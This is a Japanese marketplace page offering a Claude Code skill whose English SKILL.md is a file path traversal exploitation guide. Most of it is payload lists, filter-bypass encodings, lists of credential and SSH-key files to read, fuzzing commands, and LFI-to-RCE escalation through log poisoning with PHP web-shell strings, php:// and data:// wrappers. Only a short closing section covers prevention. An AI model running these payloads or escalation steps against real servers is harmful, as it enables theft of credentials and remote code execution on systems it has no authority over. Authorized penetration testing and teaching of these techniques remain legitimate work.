🛠️ 開発・MCP コミュニティ 🔴 エンジニア向け
👤 エンジニア・AI開発者
🛠️ ファイルPathTraversal
file-path-traversal
??ーバー内のファイルに不正にアクセスできる脆弱性(
⚡
⏱ ライブラリ調査+組込 半日 → 1時間
📺 まず動画で見る(YouTube)
▶ 【衝撃】最強のAIエージェント「Claude Code」の最新機能・使い方・プログラミングをAIで効率化する超実践術を解説! ↗
※ jpskill.com 編集部が参考用に選んだ動画です。動画の内容と Skill の挙動は厳密には一致しないことがあります。
📜 元の英語説明(参考)
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code.
🇯🇵 日本人クリエイター向け解説
一言でいうと
??ーバー内のファイルに不正にアクセスできる脆弱性(
※ jpskill.com 編集部が日本のビジネス現場向けに補足した解説です。Skill本体の挙動とは独立した参考情報です。
⚠️ ダウンロード・利用は自己責任でお願いします。当サイトは内容・動作・安全性について責任を負いません。
🎯 このSkillでできること
下記の説明文を読むと、このSkillがあなたに何をしてくれるかが分かります。Claudeにこの分野の依頼をすると、自動で発動します。
📦 インストール方法 (3ステップ)
- 1. 上の「ダウンロード」ボタンを押して .skill ファイルを取得
- 2. ファイル名の拡張子を .skill から .zip に変えて展開(macは自動展開可)
- 3. 展開してできたフォルダを、ホームフォルダの
.claude/skills/に置く- · macOS / Linux:
~/.claude/skills/ - · Windows:
%USERPROFILE%\.claude\skills\
- · macOS / Linux:
Claude Code を再起動すれば完了。「このSkillを使って…」と話しかけなくても、関連する依頼で自動的に呼び出されます。
詳しい使い方ガイドを見る →- 最終更新
- 2026-05-17
- 取得日時
- 2026-05-17
- 同梱ファイル
- 1
💬 こう話しかけるだけ — サンプルプロンプト
- › File Path Traversal を使って、最小構成のサンプルコードを示して
- › File Path Traversal の主な使い方と注意点を教えて
- › File Path Traversal を既存プロジェクトに組み込む方法を教えて
これをClaude Code に貼るだけで、このSkillが自動発動します。
📖 Claude が読む原文 SKILL.md(中身を展開)
この本文は AI(Claude)が読むための原文(英語または中国語)です。日本語訳は順次追加中。
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
File Path Traversal Testing
Purpose
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
Prerequisites
Required Tools
- Web browser with developer tools
- Burp Suite or OWASP ZAP
- cURL for testing payloads
- Wordlists for automation
- ffuf or wfuzz for fuzzing
Required Knowledge
- HTTP request/response structure
- Linux and Windows filesystem layout
- Web application architecture
- Basic understanding of file APIs
Outputs and Deliverables
- Vulnerability Report - Identified traversal points and severity
- Exploitation Proof - Extracted file contents
- Impact Assessment - Accessible files and data exposure
- Remediation Guidance - Secure coding recommendations
Core Workflow
Phase 1: Understanding Path Traversal
Path traversal occurs when applications use user input to construct file paths:
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
$template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);Attack principle:
../sequence moves up one directory- Chain multiple sequences to reach root
- Access files outside intended directory
Impact:
- Confidentiality - Read sensitive files
- Integrity - Write/modify files (in some cases)
- Availability - Delete files (in some cases)
- Code Execution - If combined with file upload or log poisoning
Phase 2: Identifying Traversal Points
Map application for potential file operations:
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=Common vulnerable functionality:
- Image loading:
/image?filename=23.jpg - Template selection:
?template=blue.php - File downloads:
/download?file=report.pdf - Document viewers:
/view?doc=manual.pdf - Include mechanisms:
?page=about
Phase 3: Basic Exploitation Techniques
Simple Path Traversal
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd # Double encoding
# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"Absolute Path Injection
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.iniPhase 4: Bypass Techniques
Bypass Stripped Traversal Sequences
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd
# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdBypass Extension Validation
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
# Path truncation
../../../etc/passwd...............................
# Double extension
../../../etc/passwd.jpg.phpBypass Base Directory Validation
# When path must start with expected directory
/var/www/images/../../../etc/passwd
# Expected path followed by traversal
images/../../../etc/passwdBypass Blacklist Filters
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af
# URL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255c
# Case variations (Windows)
....\\....\\etc\\passwdPhase 5: Linux Target Files
High-value files to target:
# System files
/etc/passwd # User accounts
/etc/shadow # Password hashes (root only)
/etc/group # Group information
/etc/hosts # Host mappings
/etc/hostname # System hostname
/etc/issue # System banner
# SSH files
/root/.ssh/id_rsa # Root private key
/root/.ssh/authorized_keys # Authorized keys
/home/<user>/.ssh/id_rsa # User private keys
/etc/ssh/sshd_config # SSH configuration
# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config
# Process information
/proc/self/environ # Environment variables
/proc/self/cmdline # Process command line
/proc/self/fd/0 # File descriptors
/proc/version # Kernel version
# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.confPhase 6: Windows Target Files
Windows-specific targets:
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAM
# IIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\
# Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.php
# User files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop\
C:\Documents and Settings\<user>\Phase 7: Automated Testing
Using Burp Suite
1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for successUsing ffuf
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
-w /usr/share/wordlists/traversal.txt \
-mc 200
# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
-mc 200,500 -acUsing wfuzz
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 \
"http://target.com/index.php?file=FUZZ"
# With headers/cookies
wfuzz -c -z file,traversal.txt \
-H "Cookie: session=abc123" \
"http://target.com/load?path=FUZZ"Phase 8: LFI to RCE Escalation
Log Poisoning
# Inject PHP code into logs
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# Include Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"Proc/self/environ
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
"http://target.com/page?file=/proc/self/environ"
# With command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
"http://target.com/page?file=/proc/self/environ&c=whoami"PHP Wrapper Exploitation
# php://filter - Read source code as base64
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
# php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
"http://target.com/page?file=php://input"
# data:// - Execute inline PHP
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
# expect:// - Execute system commands
curl "http://target.com/page?file=expect://id"Phase 9: Testing Methodology
Structured testing approach:
# Step 1: Identify potential parameters
# Look for file-related functionality
# Step 2: Test basic traversal
../../../etc/passwd
# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd
# Step 5: Test absolute paths
/etc/passwd
# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg
# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php
# Step 8: Attempt log poisoning for RCEPhase 10: Prevention Measures
Secure coding practices:
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;
// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
include("/var/www/files/" . $_GET['file']);
}
// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);
if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
include($realUserPath);
}# Python: Use os.path.realpath() and validate
import os
def safe_file_access(base_dir, filename):
# Resolve to absolute path
base = os.path.realpath(base_dir)
file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
return open(file_path, 'r').read()
else:
raise Exception("Access denied")Quick Reference
Common Payloads
| Payload | Target |
|---|---|
../../../etc/passwd |
Linux password file |
..\..\..\..\windows\win.ini |
Windows INI file |
....//....//....//etc/passwd |
Bypass simple filter |
/etc/passwd |
Absolute path |
php://filter/convert.base64-encode/resource=config.php |
Source code |
Target Files
| OS | File | Purpose |
|---|---|---|
| Linux | /etc/passwd |
User accounts |
| Linux | /etc/shadow |
Password hashes |
| Linux | /proc/self/environ |
Environment vars |
| Windows | C:\windows\win.ini |
System config |
| Windows | C:\boot.ini |
Boot config |
| Web | wp-config.php |
WordPress DB creds |
Encoding Variants
| Type | Example |
|---|---|
| URL Encoding | %2e%2e%2f = ../ |
| Double Encoding | %252e%252e%252f = ../ |
| Unicode | %c0%af = / |
| Null Byte | %00 |
Constraints and Limitations
Permission Restrictions
- Cannot read files application user cannot access
- Shadow file requires root privileges
- Many files have restrictive permissions
Application Restrictions
- Extension validation may limit file types
- Base path validation may restrict scope
- WAF may block common payloads
Testing Considerations
- Respect authorized scope
- Avoid accessing genuinely sensitive data
- Document all successful access
Troubleshooting
| Problem | Solutions |
|---|---|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |
When to Use
This skill is applicable to execute the workflow or actions described in the overview.